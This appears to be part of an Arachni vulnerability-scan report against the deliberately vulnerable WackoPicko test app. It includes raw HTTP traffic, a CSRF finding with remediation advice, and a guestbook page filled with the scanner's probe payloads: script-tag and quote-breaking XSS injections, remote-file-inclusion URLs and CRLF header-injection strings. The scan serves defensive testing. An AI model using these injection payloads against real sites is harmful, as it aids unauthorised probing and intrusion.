href="/WackoPicko/users/login.php"><Span>Login</span></a></li> </ul> </div> </div> <div class="column span-24 first last" id="search_bar_blue"> <div class="column prepend-17 span-7 first last" id="search_box"> <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;"> <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/> <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" /> </form> </div> </div> <div class="column prepend-1 span-24 first last"> <h2>Guestbook</h2> <h4>See what people are saying about us!</h4> <p class="comment">1</p> <p> - by javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p> <p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()"</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by ";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();"// </p> <p class="comment">1</p> <p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p> <p class="comment">1</p> <p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p> <p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p> <p class="comment">1</p> <p> - by ";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()" </p> <p class="comment">1</p> <p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(); </p> <p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();</p> <p> - by arachni_name </p> <p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();"</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by ";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()"// </p> <p class="comment">1</p> <p> - by ";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();" </p> <p class="comment">1</p> <p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();' </p> <p class="comment">1</p> <p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();'// </p> <p class="comment">javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p> <p> - by arachni_name </p> <p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()'//</p> <p> - by arachni_name </p> <p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()"//</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()'// </p> <p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();'</p> <p> - by arachni_name </p> <p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p> <p> - by arachni_name </p> <p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();"//</p> <p> - by arachni_name </p> <p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();//</p> <p> - by arachni_name </p> <p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p> <p> - by arachni_name </p> <p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p> <p> - by arachni_name </p> <p class="comment">window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by */; window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()/* </p> <p class="comment">',x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:'</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by </script><script>window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</script> </p> <p class="comment">1; window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by ",x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:" </p> <p class="comment">1</p> <p> - by ',x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:' </p> <p class="comment"></script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> </p> <p> - by arachni_name </p> <p class="comment">1; window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by 1; window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();// </p> <p class="comment">*/; window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()/*</p> <p> - by arachni_name </p> <p class="comment">1; window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(); </p> <p class="comment">1</p> <p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();// </p> <p class="comment">1</p> <p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p> <p class="comment">1</p> <p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();// </p> <p class="comment">1</p> <p> - by 1; window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p> <p class="comment">1</p> <p> - by 1; window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p> <p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();//</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by 1; window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(); </p> <p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p> <p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();'//</p> <p> - by arachni_name </p> <p class="comment">1tests.arachni-scanner.com/rfi.md5.txt</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by tests.arachni-scanner.com/rfi.md5.txt </p> <p class="comment">http://tests.arachni-scanner.com/rfi.md5.txt</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_nametests.arachni-scanner.com/rfi.md5.txt </p> <p class="comment">1tests.arachni-scanner.com/rfi.md5.txt </p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_namehttp://tests.arachni-scanner.com/rfi.md5.txt </p> <p class="comment">1</p> <p> - by arachni_namehttp://tests.arachni-scanner.com/rfi.md5.txt </p> <p class="comment">1</p> <p> - by arachni_nametests.arachni-scanner.com/rfi.md5.txt </p> <p class="comment">1</p> <p> - by tests.arachni-scanner.com/rfi.md5.txt </p> <p class="comment">tests.arachni-scanner.com/rfi.md5.txt </p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by http://tests.arachni-scanner.com/rfi.md5.txt </p> <p class="comment">1; window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();//</p> <p> - by arachni_name </p> <p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()'</p> <p> - by arachni_name </p> <p class="comment">javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p> <p class="comment">http://tests.arachni-scanner.com/rfi.md5.txt </p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()' </p> <p class="comment">1</p> <p> - by http://tests.arachni-scanner.com/rfi.md5.txt </p> <p class="comment">tests.arachni-scanner.com/rfi.md5.txt</p> <p> - by arachni_name </p> <p class="comment">1http://tests.arachni-scanner.com/rfi.md5.txt </p> <p> - by arachni_name </p> <p class="comment">1http://tests.arachni-scanner.com/rfi.md5.txt</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_name X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p> <p class="comment">1</p> <p> - by X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p> <p class="comment">1</p> <p> - by _arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p> <p class="comment">1</p> <p> - by arachni_name_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p> <p class="comment">1 X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_name_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p> <p class="comment">1</p> <p> - by X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p> <p class="comment"> X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_name X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p> <p class="comment">1 X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_name </p> <p class="comment"> X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no</p> <p> - by arachni_name </p> <p class="comment">hTtP://tests.arachni-scanner.com/rfi.md5.txt</p> <p> - by arachni_name </p> <p class="comment">hTtP://tests.arachni-scanner.com/rfi.md5.txt </p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by hTtP://tests.arachni-scanner.com/rfi.md5.txt </p> <p class="comment">1</p> <p> - by _arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p> <p class="comment">_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_namehTtP://tests.arachni-scanner.com/rfi.md5.txt </p> <p class="comment">_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec</p> <p> - by arachni_name </p> <p class="comment">1hTtP://tests.arachni-scanner.com/rfi.md5.txt </p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by hTtP://tests.arachni-scanner.com/rfi.md5.txt </p> <p class="comment">1_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec</p> <p> - by arachni_name </p> <p class="comment">1hTtP://tests.arachni-scanner.com/rfi.md5.txt</p> <p> - by arachni_name </p> <p class="comment">1_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_namehTtP://tests.arachni-scanner.com/rfi.md5.txt </p> <p class="comment">Hi, I love your site!</p> <p> - by adam </p> <form action="/WackoPicko/guestbook.php" method="POST"> Name: <br> <input type="text" name="name" /><br> Comment: <br> <textarea id="comment-box" name="comment"></textarea> <br> <input type="submit" value="Submit" /> </form> </div> <div class="column span-24 first last" id="footer" > <ul> <li><a href="/WackoPicko/">Home</a> |</li> <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li> <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li> <li><a href="/WackoPicko/tos.php">Terms of Service</a></li> </ul> </div> </div> </body> </html> |
Raw HTTP request used to retrieve the page.
GET /WackoPicko/guestbook/ HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 978
Content-Type: text/html
<html>
<head>
<link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
<link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print">
<!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
<link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
<title>WackoPicko.com</title>
</head>
<body>
<div class="container " style="border: 2px solid #5c95cf;">
<div class="column span-24 first last">
<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
</div>
<div id="menu">
<div class="column prepend-1 span-14 first">
<ul class="menu">
<li class=""><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
<li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
<li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
<li class="current"><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
</ul>
</div>
<div class="column prepend-1 span-7 first last">
<ul class="menu top_login" >
<li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
</ul>
</div>
</div>
<div class="column span-24 first last" id="search_bar_blue">
<div class="column prepend-17 span-7 first last" id="search_box">
<form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
<input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
<input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
</form>
</div>
</div>
<div class="column prepend-1 span-24 first last">
<h2>Guestbook</h2>
<h4>See what people are saying about us!</h4>
<p class="comment">Hi, I love your site!</p>
<p> - by adam </p>
<form action="/WackoPicko/guestbook.php" method="POST">
Name: <br>
<input type="text" name="name" /><br>
Comment: <br>
<textarea id="comment-box" name="comment"></textarea> <br>
<input type="submit" value="Submit" />
</form>
</div>
<div class="column span-24 first last" id="footer" >
<ul>
<li><a href="/WackoPicko/">Home</a> |</li>
<li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
<li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
<li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
</ul>
</div>
</div>
</body>
</html>
In the majority of today’s web applications, clients are required to submit forms which can perform sensitive operations.
An example of such a form being used would be when an administrator wishes to create a new user for the application.
In the simplest version of the form, the administrator would fill-in:
Continuing with this example, Cross Site Request Forgery (CSRF) would occur when the administrator is tricked into clicking on a link, which if logged into the application, would automatically submit the form without any further interaction.
Cyber-criminals will look for sites where sensitive functions are performed in this manner and then craft malicious requests that will be used against clients via a social engineering attack.
There are 3 things that are required for a CSRF attack to occur:
Arachni discovered that all parameters within the form were known or predictable and therefore the form could be vulnerable to CSRF.
Manual verification may be required to check whether the submission will then perform a sensitive action, such as reset a password, modify user profiles, post content on a forum, etc.
Based on the risk (determined by manual verification) of whether the form submission performs a sensitive action, the addition of anti-CSRF tokens may be required.
These tokens can be configured in such a way that each session generates a new anti-CSRF token or such that each individual request requires a new token.
It is important that the server track and maintain the status of each token (in order to reject requests accompanied by invalid ones) and therefore prevent cyber-criminals from knowing, guessing or reusing them.
For examples of framework specific remediation options, please refer to the references.
form
with inputs
MAX_FILE_SIZE
userfile
name
using
GET
at
http://192.168.0.26/WackoPicko/
pointing to
http://192.168.0.26/WackoPicko/piccheck.php
.
| Proof |
|---|
<form enctype="multipart/form-data" action="/WackoPicko/piccheck.php" method="POST"> <input type="hidden" name="MAX_FILE_SIZE" value="30000"> </input> Check this file: <input name="userfile" type="file"> </input> <br> </br> With this name: <input name="name" type="text"> </input> <br> </br> <br> </br> <input type="submit" value="Send File"> </input> <br> </br> </form> |
0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 | <form enctype="multipart/form-data" action="/WackoPicko/piccheck.php" method="POST"> <input type="hidden" name="MAX_FILE_SIZE" value="30000"> </input> Check this file: <input name="userfile" type="file"> </input> <br> </br> With this name: <input name="name" type="text"> </input> <br> </br> <br> </br> <input type="submit" value="Send File"> </input> <br> </br> </form> |
| Type | In | Action | Default inputs | Updated inputs |
|---|---|---|---|---|
form |
http://192.168.0.26/WackoPicko/ | http://192.168.0.26/WackoPicko/piccheck.php |
|
|
Transitions describe the steps required to restore the state of the page, to the one it had when it was processed by the scanner, as a series of events. In essence, each transition represents a user interaction.
| # | Time | Event | Element | Options | ||
|---|---|---|---|---|---|---|
| 0 | 3.950414 | load |
page
|
|
||
| 1 | 2.996451 | request |
http://192.168.0.26/WackoPicko/ |
|
||
| 2 | 0.337047 | request |
http://192.168.0.26/WackoPicko/css/stylings.php |
|
Raw HTTP request used to retrieve the page.
GET /WackoPicko/ HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5 Accept-Language: en-CA,*
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:48 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1267
Content-Type: text/html
<script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script>
/* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({"PHPSESSID":{"stop_at_first":true,"trace":false},"euf2e0jqacaf66gdqmin1nb8k5":{"stop_at_first":true,"trace":false}}) /* arachni_js_namespace_initialize_stop */
window._arachni_js_namespace = true;
/* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */
</script> <!-- Injected by Arachni::Browser::Javascript -->
<html>
<head>
<link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
<link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print">
<!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
<link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
<title>WackoPicko.com</title>
</head>
<body>
<div class="container " style="border: 2px solid #5c95cf;">
<div class="column span-24 first last">
<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
</div>
<div id="menu">
<div class="column prepend-1 span-14 first">
<ul class="menu">
<li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
<li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
<li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
<li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
</ul>
</div>
<div class="column prepend-1 span-7 first last">
<ul class="menu top_login" >
<li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
</ul>
</div>
</div>
<div class="column span-24 first last" id="search_bar_blue">
<div class="column prepend-17 span-7 first last" id="search_box">
<form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
<input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
<input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
</form>
</div>
</div>
<div class="column prepend-1 span-24 first last">
<h2>Welcome to WackoPicko</h2>
<p>
On WackoPicko, you can share all your crazy pics with your friends. <br />
But that's not all, you can also buy the rights to the high quality <br />
version of someone's pictures. WackoPicko is fun for the whole family.
</p>
<h3>New Here?</h3>
<p>
<h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
</p>
<p>
<h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
</p>
<p>
<h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
</p>
<p>
<h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
<script>
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
</p>
</div>
<div class="column span-24 first last" id="footer" >
<ul>
<li><a href="/WackoPicko/">Home</a> |</li>
<li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
<li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
<li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
</ul>
</div>
</div>
</body>
</html>
This is the browser-evaluated body, as a result of the listed transitions.
0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 | <html><head><script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script> /* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({"PHPSESSID":{"stop_at_first":true,"trace":false},"euf2e0jqacaf66gdqmin1nb8k5":{"stop_at_first":true,"trace":false}}) /* arachni_js_namespace_initialize_stop */ window._arachni_js_namespace = true; /* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */ </script> <!-- Injected by Arachni::Browser::Javascript --> <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection"> <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]--> <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen"> <title>WackoPicko.com</title> </head> <body> <div class="container " style="border: 2px solid #5c95cf;"> <div class="column span-24 first last"> <h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1> </div> <div id="menu"> <div class="column prepend-1 span-14 first"> <ul class="menu"> <li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li> <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li> <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li> <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li> </ul> </div> <div class="column prepend-1 span-7 first last"> <ul class="menu top_login"> <li><a href="/WackoPicko/users/login.php"><span>Login</span></a></li> </ul> </div> </div> <div class="column span-24 first last" id="search_bar_blue"> <div class="column prepend-17 span-7 first last" id="search_box"> <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;"> <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""> <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;"> </form> </div> </div> <div class="column prepend-1 span-24 first last"> <h2>Welcome to WackoPicko</h2> <p> On WackoPicko, you can share all your crazy pics with your friends. <br> But that's not all, you can also buy the rights to the high quality <br> version of someone's pictures. WackoPicko is fun for the whole family. </p> <h3>New Here?</h3> <p> </p><h4><a href="/WackoPicko/users/register.php">Create an account</a></h4> <p></p> <p> </p><h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4> <p></p> <p> </p><h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4> <p></p> <p> </p><h4>Or you can test to see if WackoPicko can handle a file:</h4> <br> <script> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>'); </script><form enctype="multipart/form-data" action="/WackoPicko/piccheck.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000">Check this file: <input name="userfile" type="file"> <br>With this name: <input name="name" type="text"> <br> <br><input type="submit" value="Send File"><br> </form> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <p></p> </div> <div class="column span-24 first last" id="footer"> <ul> <li><a href="/WackoPicko/">Home</a> |</li> <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li> <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li> <li><a href="/WackoPicko/tos.php">Terms of Service</a></li> </ul> </div> </div> </body></html> |
This is the original HTTP response body.
0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 | <script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script> /* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({"PHPSESSID":{"stop_at_first":true,"trace":false},"euf2e0jqacaf66gdqmin1nb8k5":{"stop_at_first":true,"trace":false}}) /* arachni_js_namespace_initialize_stop */ window._arachni_js_namespace = true; /* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */ </script> <!-- Injected by Arachni::Browser::Javascript --> <html> <head> <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection"> <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]--> <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen"> <title>WackoPicko.com</title> </head> <body> <div class="container " style="border: 2px solid #5c95cf;"> <div class="column span-24 first last"> <h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1> </div> <div id="menu"> <div class="column prepend-1 span-14 first"> <ul class="menu"> <li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li> <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li> <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li> <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li> </ul> </div> <div class="column prepend-1 span-7 first last"> <ul class="menu top_login" > <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li> </ul> </div> </div> <div class="column span-24 first last" id="search_bar_blue"> <div class="column prepend-17 span-7 first last" id="search_box"> <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;"> <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/> <input 